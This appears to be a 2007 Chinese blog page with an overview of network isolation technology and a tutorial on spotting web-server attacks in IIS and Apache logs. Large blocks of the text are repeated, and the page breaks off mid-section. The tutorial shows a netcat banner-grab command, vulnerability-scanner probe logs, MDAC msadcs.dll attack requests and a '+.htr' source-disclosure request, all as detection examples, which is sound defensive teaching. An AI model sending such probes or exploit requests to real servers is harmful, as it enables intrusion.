網絡隔離技術安全要素 發展方向概述
[ 2007-03-25 03:59:01 | 作者: sun ]
面對新型網絡攻擊手段的出現和高安全度網絡對安全的特殊需求,全新安全防護防范理念的網絡安全技術——“網絡隔離技術”應運而生。
網絡隔離技術的目標是確保把有害的攻擊隔離,在可信網絡之外和保證可信網絡內部信息不外泄的前提下,完成網間數據的安全交換。網絡隔離技術是在原有安全技術的基礎上發展起來的,它彌補了原有安全技術的不足,突出了自己的優勢。
隔離技術的發展歷程
網絡隔離,英文名為Network Isolation,主要是指把兩個或兩個以上可路由的網絡(如:TCP/IP)通過不可路由的協議(如:IPX/SPX、NetBEUI等)進行數據交換而達到隔離目的。由于其原理主要是采用了不同的協議,所以通常也叫協議隔離(Protocol Isolation)。1997年,信息安全專家Mark Joseph Edwards在他編寫的《Understanding Network Security》一書中,他就對協議隔離進行了歸類。在書中他明確地指出了協議隔離和防火墻不屬于同類產品。
隔離概念是在為了保護高安全度網絡環境的情況下產生的;隔離產品的大量出現,也是經歷了五代隔離技術不斷的實踐和理論相結合后得來的。
第一代隔離技術——完全的隔離。此方法使得網絡處于信息孤島狀態,做到了完全的物理隔離,需要至少兩套網絡和系統,更重要的是信息交流的不便和成本的提高,這樣給維護和使用帶來了極大的不便。
第二代隔離技術——硬件卡隔離。在客戶端增加一塊硬件卡,客戶端硬盤或其他存儲設備首先連接到該卡,然后再轉接到主板上,通過該卡能控制客戶端硬盤或其他存儲設備。而在選擇不同的硬盤時,同時選擇了該卡上不同的網絡接口,連接到不同的網絡。但是,這種隔離產品有的仍然需要網絡布線為雙網線結構,產品存在著較大的安全隱患。
第三代隔離技術—數據轉播隔離。利用轉播系統分時復制文件的途徑來實現隔離,切換時間非常之久,甚至需要手工完成,不僅明顯地減緩了訪問速度,更不支持常見的網絡應用,失去了網絡存在的意義。
第四代隔離技術—空氣開關隔離。它是通過使用單刀雙擲開關,使得內外部網絡分時訪問臨時緩存器來完成數據交換的,但在安全和性能上存在有許多問題。
第五代隔離技術—安全通道隔離。此技術通過專用通信硬件和專有安全協議等安全機制,來實現內外部網絡的隔離和數據交換,不僅解決了以前隔離技術存在的問題,并有效地把內外部網絡隔離開來,而且高效地實現了內外網數據的安全交換,透明支持多種網絡應用,成為當前隔離技術的發展方向。
隔離技術需具備的安全要點
要具有高度的自身安全性 隔離產品要保證自身具有高度的安全性,至少在理論和實踐上要比防火墻高一個安全級別。從技術實現上,除了和防火墻一樣對操作系統進行加固優化或采用安全操作系統外,關鍵在于要把外網接口和內網接口從一套操作系統中分離出來。也就是說至少要由兩套主機系統組成,一套控制外網接口,另一套控制內網接口,然后在兩套主機系統之間通過不可路由的協議進行數據交換,如此,既便黑客攻破了外網系統,仍然無法控制內網系統,就達到了更高的安全級別。
要確保網絡之間是隔離的 保證網間隔離的關鍵是網絡包不可路由到對方網絡,無論中間采用了什么轉換方法,只要最終使得一方的網絡包能夠進入到對方的網絡中,都無法稱之為隔離,即達不到隔離的效果。顯然,只是對網間的包進行轉發,并且允許建立端到端連接的防火墻,是沒有任何隔離效果的。此外,那些只是把網絡包轉換為文本,交換到對方網絡后,再把文本轉換為網絡包的產品也是沒有做到隔離的。
要保證網間交換的只是應用數據 既然要達到網絡隔離,就必須做到徹底防范基于網絡協議的攻擊,即不能夠讓網絡層的攻擊包到達要保護的網絡中,所以就必須進行協議分析,完成應用層數據的提取,然后進行數據交換,這樣就把諸如TearDrop、Land、Smurf和SYN Flood等網絡攻擊包,徹底地阻擋在了可信網絡之外,從而明顯地增強了可信網絡的安全性。
要對網間的訪問進行嚴格的控制和檢查 作為一套適用于高安全度網絡的安全設備,要確保每次數據交換都是可信的和可控制的,嚴格防止非法通道的出現,以確保信息數據的安全和訪問的可審計性。所以必須施加以一定的技術,保證每一次數據交換過程都是可信的,并且內容是可控制的,可采用基于會話的認證技術和內容分析與控制引擎等技術來實現。
要在堅持隔離的前提下保證網絡暢通和應用透明 隔離產品會部署在多種多樣的復雜網絡環境中,并且往往是數據交換的關鍵點,因此,產品要具有很高的處理性能,不能夠成為網絡交換的瓶頸,要有很好的穩定性;不能夠出現時斷時續的情況,要有很強的適應性,能夠透明接入網絡,并且透明支持多種應用。
網絡隔離的關鍵點
網絡隔離的關鍵是在于系統對通信數據的控制,即通過不可路由的協議來完成網間的數據交換。由于通信硬件設備工作在網絡七層的最下層,并不能感知到交換數據的機密性、完整性、可用性、可控性、抗抵賴等安全要素,所以這要通過訪問控制、身份認證、加密簽名等安全機制來實現,而這些機制的實現都是通過軟件來實現的。
因此,隔離的關鍵點就成了要盡量提高網間數據交換的速度,并且對應用能夠透明支持,以適應復雜和高帶寬需求的網間數據交換。而由于設計原理問題使得第三代和第四代隔離產品在這方面很難突破,既便有所改進也必須付出巨大的成本,和“適度安全”理念相悖。
隔離技術的未來發展方向
第五代隔離技術的出現,是在對市場上網絡隔離產品和高安全度網需求的詳細分析情況下產生的,它不僅很好地解決了第三代和第四代很難解決的速度瓶頸問題,并且先進的安全理念和設計思路,明顯地提升了產品的安全功能,是一種創新的隔離防護手段。
隔離原理 第五代隔離技術的實現原理是通過專用通信設備、專有安全協議和加密驗證機制及應用層數據提取和鑒別認證技術,進行不同安全級別網絡之間的數據交換,徹底阻斷了網絡間的直接TCP/IP連接,同時對網間通信的雙方、內容、過程施以嚴格的身份認證、內容過濾、安全審計等多種安全防護機制,從而保證了網間數據交換的安全、可控,杜絕了由于操作系統和網絡協議自身漏洞帶來的安全風險。
網絡隔離技術的目標是確保把有害的攻擊隔離,在可信網絡之外和保證可信網絡內部信息不外泄的前提下,完成網間數據的安全交換。網絡隔離技術是在原有安全技術的基礎上發展起來的,它彌補了原有安全技術的不足,突出了自己的優勢。
隔離技術的發展歷程
網絡隔離,英文名為Network Isolation,主要是指把兩個或兩個以上可路由的網絡(如:TCP/IP)通過不可路由的協議(如:IPX/SPX、NetBEUI等)進行數據交換而達到隔離目的。由于其原理主要是采用了不同的協議,所以通常也叫協議隔離(Protocol Isolation)。1997年,信息安全專家Mark Joseph Edwards在他編寫的《Understanding Network Security》一書中,他就對協議隔離進行了歸類。在書中他明確地指出了協議隔離和防火墻不屬于同類產品。
隔離概念是在為了保護高安全度網絡環境的情況下產生的;隔離產品的大量出現,也是經歷了五代隔離技術不斷的實踐和理論相結合后得來的。
第一代隔離技術——完全的隔離。此方法使得網絡處于信息孤島狀態,做到了完全的物理隔離,需要至少兩套網絡和系統,更重要的是信息交流的不便和成本的提高,這樣給維護和使用帶來了極大的不便。
第二代隔離技術——硬件卡隔離。在客戶端增加一塊硬件卡,客戶端硬盤或其他存儲設備首先連接到該卡,然后再轉接到主板上,通過該卡能控制客戶端硬盤或其他存儲設備。而在選擇不同的硬盤時,同時選擇了該卡上不同的網絡接口,連接到不同的網絡。但是,這種隔離產品有的仍然需要網絡布線為雙網線結構,產品存在著較大的安全隱患。
第三代隔離技術—數據轉播隔離。利用轉播系統分時復制文件的途徑來實現隔離,切換時間非常之久,甚至需要手工完成,不僅明顯地減緩了訪問速度,更不支持常見的網絡應用,失去了網絡存在的意義。
第四代隔離技術—空氣開關隔離。它是通過使用單刀雙擲開關,使得內外部網絡分時訪問臨時緩存器來完成數據交換的,但在安全和性能上存在有許多問題。
第五代隔離技術—安全通道隔離。此技術通過專用通信硬件和專有安全協議等安全機制,來實現內外部網絡的隔離和數據交換,不僅解決了以前隔離技術存在的問題,并有效地把內外部網絡隔離開來,而且高效地實現了內外網數據的安全交換,透明支持多種網絡應用,成為當前隔離技術的發展方向。
隔離技術需具備的安全要點
要具有高度的自身安全性 隔離產品要保證自身具有高度的安全性,至少在理論和實踐上要比防火墻高一個安全級別。從技術實現上,除了和防火墻一樣對操作系統進行加固優化或采用安全操作系統外,關鍵在于要把外網接口和內網接口從一套操作系統中分離出來。也就是說至少要由兩套主機系統組成,一套控制外網接口,另一套控制內網接口,然后在兩套主機系統之間通過不可路由的協議進行數據交換,如此,既便黑客攻破了外網系統,仍然無法控制內網系統,就達到了更高的安全級別。
要確保網絡之間是隔離的 保證網間隔離的關鍵是網絡包不可路由到對方網絡,無論中間采用了什么轉換方法,只要最終使得一方的網絡包能夠進入到對方的網絡中,都無法稱之為隔離,即達不到隔離的效果。顯然,只是對網間的包進行轉發,并且允許建立端到端連接的防火墻,是沒有任何隔離效果的。此外,那些只是把網絡包轉換為文本,交換到對方網絡后,再把文本轉換為網絡包的產品也是沒有做到隔離的。
要保證網間交換的只是應用數據 既然要達到網絡隔離,就必須做到徹底防范基于網絡協議的攻擊,即不能夠讓網絡層的攻擊包到達要保護的網絡中,所以就必須進行協議分析,完成應用層數據的提取,然后進行數據交換,這樣就把諸如TearDrop、Land、Smurf和SYN Flood等網絡攻擊包,徹底地阻擋在了可信網絡之外,從而明顯地增強了可信網絡的安全性。
要對網間的訪問進行嚴格的控制和檢查 作為一套適用于高安全度網絡的安全設備,要確保每次數據交換都是可信的和可控制的,嚴格防止非法通道的出現,以確保信息數據的安全和訪問的可審計性。所以必須施加以一定的技術,保證每一次數據交換過程都是可信的,并且內容是可控制的,可采用基于會話的認證技術和內容分析與控制引擎等技術來實現。
要在堅持隔離的前提下保證網絡暢通和應用透明 隔離產品會部署在多種多樣的復雜網絡環境中,并且往往是數據交換的關鍵點,因此,產品要具有很高的處理性能,不能夠成為網絡交換的瓶頸,要有很好的穩定性;不能夠出現時斷時續的情況,要有很強的適應性,能夠透明接入網絡,并且透明支持多種應用。
網絡隔離的關鍵點
網絡隔離的關鍵是在于系統對通信數據的控制,即通過不可路由的協議來完成網間的數據交換。由于通信硬件設備工作在網絡七層的最下層,并不能感知到交換數據的機密性、完整性、可用性、可控性、抗抵賴等安全要素,所以這要通過訪問控制、身份認證、加密簽名等安全機制來實現,而這些機制的實現都是通過軟件來實現的。
因此,隔離的關鍵點就成了要盡量提高網間數據交換的速度,并且對應用能夠透明支持,以適應復雜和高帶寬需求的網間數據交換。而由于設計原理問題使得第三代和第四代隔離產品在這方面很難突破,既便有所改進也必須付出巨大的成本,和“適度安全”理念相悖。
隔離技術的未來發展方向
第五代隔離技術的出現,是在對市場上網絡隔離產品和高安全度網需求的詳細分析情況下產生的,它不僅很好地解決了第三代和第四代很難解決的速度瓶頸問題,并且先進的安全理念和設計思路,明顯地提升了產品的安全功能,是一種創新的隔離防護手段。
隔離原理 第五代隔離技術的實現原理是通過專用通信設備、專有安全協議和加密驗證機制及應用層數據提取和鑒別認證技術,進行不同安全級別網絡之間的數據交換,徹底阻斷了網絡間的直接TCP/IP連接,同時對網間通信的雙方、內容、過程施以嚴格的身份認證、內容過濾、安全審計等多種安全防護機制,從而保證了網間數據交換的安全、可控,杜絕了由于操作系統和網絡協議自身漏洞帶來的安全風險。
從服務器的記錄尋找黑客的蛛絲馬跡
[ 2007-03-25 03:58:49 | 作者: sun ]
當服務器被攻擊時,最容易被人忽略的地方,就是記錄文件,服務器的記錄文件了黑客活動的蛛絲馬跡。在這里,我為大家介紹一下兩種常見的網頁服務器中最重要的記錄文件,分析服務器遭到攻擊后,黑客在記錄文件中留下什么記錄。
目前最常見的網頁服務器有兩種:Apache和微軟的Internet Information Server (簡稱IIS)。這兩種服務器都有一般版本和SSL認證版本,方便黑客對加密和未加密的服務器進行攻擊。
IIS的預設記錄文件地址在 c:winntsystem32logfilesw3svc1的目錄下,文件名是當天的日期,如yymmdd.log。系統會每天產生新的記錄文件。預設的格式是W3C延伸記錄文件格式(W3C Extended Log File Format),很多相關軟件都可以解譯、分析這種格式的檔案。記錄文件在預設的狀況下會記錄時間、客戶端IP地址、method(GET、POST等)、URI stem(要求的資源)、和HTTP狀態(數字狀態代碼)。這些字段大部分都一看就懂,可是HTTP狀態就需要解讀了。一般而言,如果代碼是在200到299代表成功。常見的200狀態碼代表符合客戶端的要求。300到399代表必須由客戶端采取動作才能滿足所提出的要求。400到499和500到599代表客戶端和服務器有問題。最常見的狀態代碼有兩個,一個是404,代表客戶端要求的資源不在服務器上,403代表的是所要求的資源拒絕服務。Apache記錄文件的預設儲存位置在/usr/local/apache/logs。最有價值的記錄文件是access_log,不過 ssl_request_log和ssl_engine_log也能提供有用的資料。 access_log記錄文件有七個字段,包括客戶端IP地址、特殊人物識別符、用戶名稱、日期、Method Resource Protocol(GET、POST等;要求哪些資源;然后是協議的版本)、HTTP狀態、還有傳輸的字節。
我在這里所用的是與黑客用的相似的模擬攻擊網站方式和工具。(注意:在本文中所介紹的方法請大家不要試用,請大家自覺遵守網絡準則!)
分析過程
網頁服務器版本是很重要的信息,黑客一般先向網頁服務器提出要求,讓服務器送回本身的版本信息。只要把「HEAD / HTTP/1.0」這個字符串用常見的netcat utility(相關資料網址:http://www.l0pht.com/~weld/netcat/)和OpenSSL binary(相關資料網址:http://www.openssl.org/)送到開放服務器的通訊端口就成了。注意看下面的示范:
C:>nc -n 10.0.2.55 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 08 Mar 2001 14:31:00 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQQQPA=IHOJAGJDECOLLGIBNKMCEEED; path=/
Cache-control: private
這種形式的要求在IIS和Apache的記錄文件中會生成以下記錄:
IIS: 15:08:44 11.1.2.80 HEAD /Default.asp 200
Linux: 11.1.2.80 - - [08/Mar/2001:15:56:39 -0700] "HEAD / HTTP/1.0" 200 0
雖然這類要求合法,看似很平常,不過卻常常是網絡攻擊的前奏曲。access_log和IIS的記錄文件沒有表明這個要求是連到SSL服務器還是一般的網頁服務器,可是Apache的 ssl_request_log和ssl_engine_log(在/usr/local/apache/logs目錄下)這兩個記錄文件就會記錄是否有聯機到SSL服務器。請看以下的ssl_request_log記錄文件:
[07/Mar/2001:15:32:52 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "HEAD / HTTP/1.0" 0
第三和第四個字段表示客戶端使用的是哪種加密方式。以下的ssl_request_log分別記錄從OpenSSL、 Internet Explorer和Netscape客戶端程序發出的要求。
[07/Mar/2001:15:48:26 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "GET / HTTP/1.0" 2692
[07/Mar/2001:15:52:51 -0700] 10.0.2.55 TLSv1 RC4-MD5 "GET / HTTP/1.1" 2692
[07/Mar/2001:15:54:46 -0700] 11.1.1.50 SSLv3 EXP-RC4-MD5 "GET / HTTP/1.0" 2692
[07/Mar/2001:15:55:34 –0700] 11.1.2.80 SSLv3 RC4-MD5 “GET / HTTP/1.0” 2692
另外黑客通常會復制一個網站(也就是所謂的鏡射網站。),來取得發動攻擊所需要的信息。網頁原始碼中的批注字段常有目錄、文件名甚至密碼的有用資料。復制網站常用的工具包括窗口系統的Teleport Pro(網址:http://www.tenmax.com/teleport/pro/home.htm)和Unix系統的wget(網址:http://www.gnu.org/manual/wget/)。在這里我為大家分析wget和TeleportPro這兩個軟件攻擊網頁服務器后記錄文件中的內容。這兩個軟件能全面快速搜尋整個網站,對所有公開的網頁提出要求。只要檢查一下記錄文件就知道,要解譯鏡射這個動作是很簡單的事。以下是IIS的記錄文件:
16:28:52 11.1.2.80 GET /Default.asp 200
16:28:52 11.1.2.80 GET /robots.txt 404
16:28:52 11.1.2.80 GET /header_protecting_your_privacy.gif 200
16:28:52 11.1.2.80 GET /header_fec_reqs.gif 200
16:28:55 11.1.2.80 GET /photo_contribs_sidebar.jpg 200
16:28:55 11.1.2.80 GET /g2klogo_white_bgd.gif 200
16:28:55 11.1.2.80 GET /header_contribute_on_line.gif 200
注:11.1.2.80這個主機是Unix系統的客戶端,是用wget軟件發出請求。
16:49:01 11.1.1.50 GET /Default.asp 200
16:49:01 11.1.1.50 GET /robots.txt 404
16:49:01 11.1.1.50 GET /header_contribute_on_line.gif 200
16:49:01 11.1.1.50 GET /g2klogo_white_bgd.gif 200
16:49:01 11.1.1.50 GET /photo_contribs_sidebar.jpg 200
16:49:01 11.1.1.50 GET /header_fec_reqs.gif 200
16:49:01 11.1.1.50 GET /header_protecting_your_privacy.gif 200
注:11.1.1.50系統是窗口環境的客戶端,用的是TeleportPro發出請求。
注意:以上兩個主機都要求robots.txt這個檔,其實這個檔案是網頁管理員的工具,作用是防止wget和TeleportPro這類自動抓文件軟件對某些網頁從事抓取或搜尋的動作。如果有人提出robots.txt檔的要求,常常代表是要鏡射整個網站。但,TeleportPro和wget這兩個軟件都可以把要求robots.txt這個文件的功能取消。另一個偵測鏡射動作的方式,是看看有沒有同一個客戶端IP反復提出資源要求。
黑客還可以用網頁漏洞稽核軟件:Whisker(網址:http://www.wiretrip.net/),來偵查網頁服務器有沒有安全后門(主要是檢查有沒有cgi-bin程序,這種程序會讓系統產生安全漏洞)。以下是IIS和Apache網頁服務器在執行Whisker后產生的部分記錄文件。
IIS:
13:17:56 11.1.1.50 GET /SiteServer/Publishing/viewcode.asp 404
13:17:56 11.1.1.50 GET /msadc/samples/adctest.asp 200
13:17:56 11.1.1.50 GET /advworks/equipment/catalog_type.asp 404
13:17:56 11.1.1.50 GET /iisadmpwd/aexp4b.htr 200
13:17:56 11.1.1.50 HEAD /scripts/samples/details.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/details.idc 200
13:17:56 11.1.1.50 HEAD /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 HEAD /scripts/tools/newdsn.exe 404
13:17:56 11.1.1.50 HEAD /msadc/msadcs.dll 200
13:17:56 11.1.1.50 GET /scripts/iisadmin/bdir.htr 200
13:17:56 11.1.1.50 HEAD /carbo.dll 404
13:17:56 11.1.1.50 HEAD /scripts/proxy/ 403
13:17:56 11.1.1.50 HEAD /scripts/proxy/w3proxy.dll 500
13:17:56 11.1.1.50 GET /scripts/proxy/w3proxy.dll 500
Apache:
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfcache.map HTTP/1.0" 404 266
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 289
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfappman/index.cfm HTTP/1.0" 404 273
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cgi-bin/ HTTP/1.0" 403 267
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 277
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_inf.html HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_pvt/ HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/webdist.cgi HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/handler HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/wrap HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 0
大家要偵測這類攻擊的關鍵,就在于從單一IP地址發出大量的404 HTTP狀態代碼。只要注意到這類信息,就可以分析對方要求的資源;于是它們就會拼命要求提供 cgi-bin scripts(Apache 服務器的 cgi-bin 目錄;IIS服務器的 scripts目錄)。
小結
網頁如果被人探訪過,總會在記錄文件留下什么線索。如果網頁管理員警覺性夠高,應該會把分析記錄文件作為追查線索,并且在檢查后發現網站真的有漏洞時,就能預測會有黑客攻擊網站。
接下來我要向大家示范兩種常見的網頁服務器攻擊方式,分析服務器在受到攻擊后黑客在記錄文件中痕跡。
(1)MDAC攻擊
MDAC攻擊法可以讓網頁的客戶端在IIS網頁服務器上執行命令。如果有人開始攻擊IIS服務器,記錄文件就會記下客戶端曾經呼叫msadcs.dll文檔:
17:48:49 12.1.2.8 GET /msadc/msadcs.dll 200
17:48:51 12.1.2.8 POST /msadc/msadcs.dll 200
(2)利用原始碼漏洞
第二種攻擊方式也很普遍,就是會影響ASP和Java網頁的暴露原始碼漏洞。 最晚被發現的安全漏洞是 +.htr 臭蟲,這個bug會顯示ASP原始碼。 如果有人利用這個漏洞攻擊,就會在IIS的記錄文件里面留下這些線索:
17:50:13 11.1.2.80 GET /default.asp+.htr 200
網頁常會只讓有權限的使用者進入。接下來我們要讓各位看 Apache的access_log記錄文件會在登錄失敗時留下什么線索:
12.1.2.8 - user [08/Mar/2001:18:58:29 -0700] "GET /private/ HTTP/1.0" 401 462
注:第三欄里面的使用者名稱是「user」。還有要注意HTTP的狀態代號是401,代表非法存取。
目前最常見的網頁服務器有兩種:Apache和微軟的Internet Information Server (簡稱IIS)。這兩種服務器都有一般版本和SSL認證版本,方便黑客對加密和未加密的服務器進行攻擊。
IIS的預設記錄文件地址在 c:winntsystem32logfilesw3svc1的目錄下,文件名是當天的日期,如yymmdd.log。系統會每天產生新的記錄文件。預設的格式是W3C延伸記錄文件格式(W3C Extended Log File Format),很多相關軟件都可以解譯、分析這種格式的檔案。記錄文件在預設的狀況下會記錄時間、客戶端IP地址、method(GET、POST等)、URI stem(要求的資源)、和HTTP狀態(數字狀態代碼)。這些字段大部分都一看就懂,可是HTTP狀態就需要解讀了。一般而言,如果代碼是在200到299代表成功。常見的200狀態碼代表符合客戶端的要求。300到399代表必須由客戶端采取動作才能滿足所提出的要求。400到499和500到599代表客戶端和服務器有問題。最常見的狀態代碼有兩個,一個是404,代表客戶端要求的資源不在服務器上,403代表的是所要求的資源拒絕服務。Apache記錄文件的預設儲存位置在/usr/local/apache/logs。最有價值的記錄文件是access_log,不過 ssl_request_log和ssl_engine_log也能提供有用的資料。 access_log記錄文件有七個字段,包括客戶端IP地址、特殊人物識別符、用戶名稱、日期、Method Resource Protocol(GET、POST等;要求哪些資源;然后是協議的版本)、HTTP狀態、還有傳輸的字節。
我在這里所用的是與黑客用的相似的模擬攻擊網站方式和工具。(注意:在本文中所介紹的方法請大家不要試用,請大家自覺遵守網絡準則!)
分析過程
網頁服務器版本是很重要的信息,黑客一般先向網頁服務器提出要求,讓服務器送回本身的版本信息。只要把「HEAD / HTTP/1.0」這個字符串用常見的netcat utility(相關資料網址:http://www.l0pht.com/~weld/netcat/)和OpenSSL binary(相關資料網址:http://www.openssl.org/)送到開放服務器的通訊端口就成了。注意看下面的示范:
C:>nc -n 10.0.2.55 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 08 Mar 2001 14:31:00 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQQQPA=IHOJAGJDECOLLGIBNKMCEEED; path=/
Cache-control: private
這種形式的要求在IIS和Apache的記錄文件中會生成以下記錄:
IIS: 15:08:44 11.1.2.80 HEAD /Default.asp 200
Linux: 11.1.2.80 - - [08/Mar/2001:15:56:39 -0700] "HEAD / HTTP/1.0" 200 0
雖然這類要求合法,看似很平常,不過卻常常是網絡攻擊的前奏曲。access_log和IIS的記錄文件沒有表明這個要求是連到SSL服務器還是一般的網頁服務器,可是Apache的 ssl_request_log和ssl_engine_log(在/usr/local/apache/logs目錄下)這兩個記錄文件就會記錄是否有聯機到SSL服務器。請看以下的ssl_request_log記錄文件:
[07/Mar/2001:15:32:52 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "HEAD / HTTP/1.0" 0
第三和第四個字段表示客戶端使用的是哪種加密方式。以下的ssl_request_log分別記錄從OpenSSL、 Internet Explorer和Netscape客戶端程序發出的要求。
[07/Mar/2001:15:48:26 -0700] 11.1.1.50 SSLv3 EDH-RSA-DES-CBC3-SHA "GET / HTTP/1.0" 2692
[07/Mar/2001:15:52:51 -0700] 10.0.2.55 TLSv1 RC4-MD5 "GET / HTTP/1.1" 2692
[07/Mar/2001:15:54:46 -0700] 11.1.1.50 SSLv3 EXP-RC4-MD5 "GET / HTTP/1.0" 2692
[07/Mar/2001:15:55:34 –0700] 11.1.2.80 SSLv3 RC4-MD5 “GET / HTTP/1.0” 2692
另外黑客通常會復制一個網站(也就是所謂的鏡射網站。),來取得發動攻擊所需要的信息。網頁原始碼中的批注字段常有目錄、文件名甚至密碼的有用資料。復制網站常用的工具包括窗口系統的Teleport Pro(網址:http://www.tenmax.com/teleport/pro/home.htm)和Unix系統的wget(網址:http://www.gnu.org/manual/wget/)。在這里我為大家分析wget和TeleportPro這兩個軟件攻擊網頁服務器后記錄文件中的內容。這兩個軟件能全面快速搜尋整個網站,對所有公開的網頁提出要求。只要檢查一下記錄文件就知道,要解譯鏡射這個動作是很簡單的事。以下是IIS的記錄文件:
16:28:52 11.1.2.80 GET /Default.asp 200
16:28:52 11.1.2.80 GET /robots.txt 404
16:28:52 11.1.2.80 GET /header_protecting_your_privacy.gif 200
16:28:52 11.1.2.80 GET /header_fec_reqs.gif 200
16:28:55 11.1.2.80 GET /photo_contribs_sidebar.jpg 200
16:28:55 11.1.2.80 GET /g2klogo_white_bgd.gif 200
16:28:55 11.1.2.80 GET /header_contribute_on_line.gif 200
注:11.1.2.80這個主機是Unix系統的客戶端,是用wget軟件發出請求。
16:49:01 11.1.1.50 GET /Default.asp 200
16:49:01 11.1.1.50 GET /robots.txt 404
16:49:01 11.1.1.50 GET /header_contribute_on_line.gif 200
16:49:01 11.1.1.50 GET /g2klogo_white_bgd.gif 200
16:49:01 11.1.1.50 GET /photo_contribs_sidebar.jpg 200
16:49:01 11.1.1.50 GET /header_fec_reqs.gif 200
16:49:01 11.1.1.50 GET /header_protecting_your_privacy.gif 200
注:11.1.1.50系統是窗口環境的客戶端,用的是TeleportPro發出請求。
注意:以上兩個主機都要求robots.txt這個檔,其實這個檔案是網頁管理員的工具,作用是防止wget和TeleportPro這類自動抓文件軟件對某些網頁從事抓取或搜尋的動作。如果有人提出robots.txt檔的要求,常常代表是要鏡射整個網站。但,TeleportPro和wget這兩個軟件都可以把要求robots.txt這個文件的功能取消。另一個偵測鏡射動作的方式,是看看有沒有同一個客戶端IP反復提出資源要求。
黑客還可以用網頁漏洞稽核軟件:Whisker(網址:http://www.wiretrip.net/),來偵查網頁服務器有沒有安全后門(主要是檢查有沒有cgi-bin程序,這種程序會讓系統產生安全漏洞)。以下是IIS和Apache網頁服務器在執行Whisker后產生的部分記錄文件。
IIS:
13:17:56 11.1.1.50 GET /SiteServer/Publishing/viewcode.asp 404
13:17:56 11.1.1.50 GET /msadc/samples/adctest.asp 200
13:17:56 11.1.1.50 GET /advworks/equipment/catalog_type.asp 404
13:17:56 11.1.1.50 GET /iisadmpwd/aexp4b.htr 200
13:17:56 11.1.1.50 HEAD /scripts/samples/details.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/details.idc 200
13:17:56 11.1.1.50 HEAD /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 GET /scripts/samples/ctguestb.idc 200
13:17:56 11.1.1.50 HEAD /scripts/tools/newdsn.exe 404
13:17:56 11.1.1.50 HEAD /msadc/msadcs.dll 200
13:17:56 11.1.1.50 GET /scripts/iisadmin/bdir.htr 200
13:17:56 11.1.1.50 HEAD /carbo.dll 404
13:17:56 11.1.1.50 HEAD /scripts/proxy/ 403
13:17:56 11.1.1.50 HEAD /scripts/proxy/w3proxy.dll 500
13:17:56 11.1.1.50 GET /scripts/proxy/w3proxy.dll 500
Apache:
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfcache.map HTTP/1.0" 404 266
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 289
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cfappman/index.cfm HTTP/1.0" 404 273
11.1.1.50 - - [08/Mar/2001:12:57:28 -0700] "GET /cgi-bin/ HTTP/1.0" 403 267
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 277
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_inf.html HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /_vti_pvt/ HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/webdist.cgi HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/handler HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/wrap HTTP/1.0" 404 0
11.1.1.50 - - [08/Mar/2001:12:57:29 -0700] "HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 0
大家要偵測這類攻擊的關鍵,就在于從單一IP地址發出大量的404 HTTP狀態代碼。只要注意到這類信息,就可以分析對方要求的資源;于是它們就會拼命要求提供 cgi-bin scripts(Apache 服務器的 cgi-bin 目錄;IIS服務器的 scripts目錄)。
小結
網頁如果被人探訪過,總會在記錄文件留下什么線索。如果網頁管理員警覺性夠高,應該會把分析記錄文件作為追查線索,并且在檢查后發現網站真的有漏洞時,就能預測會有黑客攻擊網站。
接下來我要向大家示范兩種常見的網頁服務器攻擊方式,分析服務器在受到攻擊后黑客在記錄文件中痕跡。
(1)MDAC攻擊
MDAC攻擊法可以讓網頁的客戶端在IIS網頁服務器上執行命令。如果有人開始攻擊IIS服務器,記錄文件就會記下客戶端曾經呼叫msadcs.dll文檔:
17:48:49 12.1.2.8 GET /msadc/msadcs.dll 200
17:48:51 12.1.2.8 POST /msadc/msadcs.dll 200
(2)利用原始碼漏洞
